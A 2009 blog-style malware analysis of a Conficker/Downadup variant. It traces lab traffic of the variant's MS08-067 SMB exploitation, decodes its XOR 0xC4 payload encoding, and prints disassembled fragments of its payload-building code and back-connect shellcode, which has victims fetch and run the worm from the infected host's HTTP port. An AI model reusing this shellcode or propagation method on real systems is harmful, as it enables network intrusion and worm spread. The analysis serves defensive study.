Thursday, January 1, 2009

Analyzing the Infection Traffic Analysis of Downadup/Conficker/Kido Variant

While analyzing the variant of Downadup/Conficker/Kido , I setup my analysis lab to know how exactly it attacks on other machines in LAN. So , I infected test machine “IP 192.168.1.7″ and then run the sniffer like wireshark. As you can see in following image on successful connection to port 445 (SMB)of 192.168.1.6 , it is trying to send “NetPathCanonicalize” request by SRVSVC service ( Ms08-067 Vulnerabilty) See packet 113 see left hand side figure 1.



I found, after infecting the machine, it creates local http server (random port) to distribute the malware .To infect other machine, it’ll send the same URL to victims. But you cann’t see that request in packets “Path Query” in “Netpathcanonicalize request” as it is encrypted!!! How do i came to know ..

Answer—>>There is decyption routine in this packet itself .. see left hand side figure 2 this is data of packet 113.



It decodes to:

shortloc_8899FA 8031C4 xor byte ptr [ecx], 0C4h
seg000:008899FD 41 inc ecx
seg000:008899FE 6681394D53 cmp word ptr [ecx], 534Dh
seg000:00889A03 75F5 jnz short loc_8899FA


It means the payload is encrypted with”XOR 0xC4″ . This code decrypts the data by XORing with 0xC4 until word 0×534D comes. So, here it is see left hand side figue 3:




Here you can see clearly , this is back-connect shellcode . So its infection method is;


1. It’ll exploit the vulnerabilty.

2. Successful exploitation results execution of payload.

3. Payload tells other machine to connect “already infected” machine in this form

“http://[infectedPC ip]:port/[random]” . Here in my case it is “http://192.168.1.7:6216/ewflztq”

Infected machine had already opened the random port 6216 to spread malware. the string “ewflztq” is randomly generated for a particular session. From that location it downloads the copy of malware and do execution.

The same thing I verified in the code of malware specimen . see below
seg000:0087966F 50 push eax ; _DWORD
seg000:00879670 68 B4 3F 87 00 push offset aHttpD_D_D_DDS ; “http://%d.%d.%d.%d:%d/%s”
seg000:00879675 8D 45 80 lea eax, [ebp+var_80]
seg000:00879678 68 80 00 00 00 push 80h ; _DWORD
seg000:0087967D 50 push eax ; _DWORD
seg000:0087967E FF 15 B8 12 87 00 call ds:MSVCRT_snprintf
seg000:00879684 8D 45 80 lea eax, [ebp+var_80]
seg000:00879687 50 push eax
seg000:00879688 C6 45 FF 00 mov [ebp+var_1], 0
seg000:0087968C E8 2F D9 00 00 call j_MSVCRT_strlen
seg000:00879691 83 C4 28 add esp, 28h
seg000:00879694 05 BE 00 00 00 add eax, 0BEh
seg000:00879699 50 push eax
seg000:0087969A 6A 40 push 40h
seg000:0087969C FF 15 C4 10 87 00 call ds:GlobalAlloc
seg000:008796A2 85 C0 test eax, eax
seg000:008796A4 8B 75 08 mov esi, [ebp+arg_0]
seg000:008796A7 89 06 mov [esi], eax
seg000:008796A9 0F 84 84 00 00 00 jz loc_879733
seg000:008796AF 53 push ebx
seg000:008796B0 57 push edi
seg000:008796B1 BF B9 00 00 00 mov edi, 0B9h
seg000:008796B6 57 push edi
seg000:008796B7 68 F0 99 88 00 push offset Exploit_PayLoad_BackConnect
seg000:008796BC 50 push eax
seg000:008796BD E8 10 D9 00 00 call j_MSVCRT_memcpy

Encryption Loop
seg000:008796F5 Do_Crypt_Payload: ;
seg000:008796F5 8B 06 mov eax, [esi]
seg000:008796F7 03 C7 add eax, edi
seg000:008796F9 80 30 C4 xor byte ptr [eax], 0C4h
seg000:008796FC 8D 45 80 lea eax, [ebp+var_80]
seg000:008796FF 50 push eax
seg000:00879700 47 inc edi
seg000:00879701 E8 BA D8 00 00 call j_MSVCRT_strlen
seg000:00879706 03 C3 add eax, ebx
seg000:00879708 3B F8 cmp edi, eax
seg000:0087970A 59 pop ecx
seg000:0087970B 72 E8 jb short Do_Crypt_Payload
seg000:0087970D
seg000:0087970D loc_87970D:
seg000:0087970D 8B 06 mov eax, [esi]
seg000:0087970F C6 04 07 4D mov byte ptr [edi+eax], 4Dh
seg000:00879713 8B 06 mov eax, [esi]
seg000:00879715 C6 44 38 01 53 mov byte ptr [eax+edi+1], 53h
seg000:0087971A 8B 06 mov eax, [esi]
seg000:0087971C C6 44 38 02 00mov byte ptr [eax+edi+2], 0

And the Payload is :

Exploit_PayLoad_BackConnect: ;
seg000:008899F0
seg000:008899F0 E8 FF FF FF FF call near ptr Exploit_PayLoad_BackConnect+4
seg000:008899F0 ; —————————————————————————
seg000:008899F5 C2 db 0C2h ; -
seg000:008899F6 ; —————————————————————————
seg000:008899F6 5F pop edi
seg000:008899F7 8D 4F 10 lea ecx, [edi+10h]
seg000:008899FA
seg000:008899FA loc_8899FA:
seg000:008899FA 80 31 C4 xor byte ptr [ecx], 0C4h
seg000:008899FD 41 inc ecx
seg000:008899FE 66 81 39 4D 53 cmp word ptr [ecx], 534Dh
seg000:00889A03 75 F5 jnz short loc_8899FA
seg000:00889A05 FC cld
seg000:00889A06 6A 02 push 2
seg000:00889A08 59 pop ecx
seg000:00889A09 64 8B 41 2E mov eax, fs:[ecx+2Eh]
seg000:00889A0D 8B 40 0C mov eax, [eax+0Ch]
seg000:00889A10 8B 40 1C mov eax, [eax+1Ch]
seg000:00889A13 8B 00 mov eax, [eax]
seg000:00889A15 8B 58 08 mov ebx, [eax+8]
seg000:00889A18 8D B7 A1 00 00 00 lea esi, [edi+0A1h]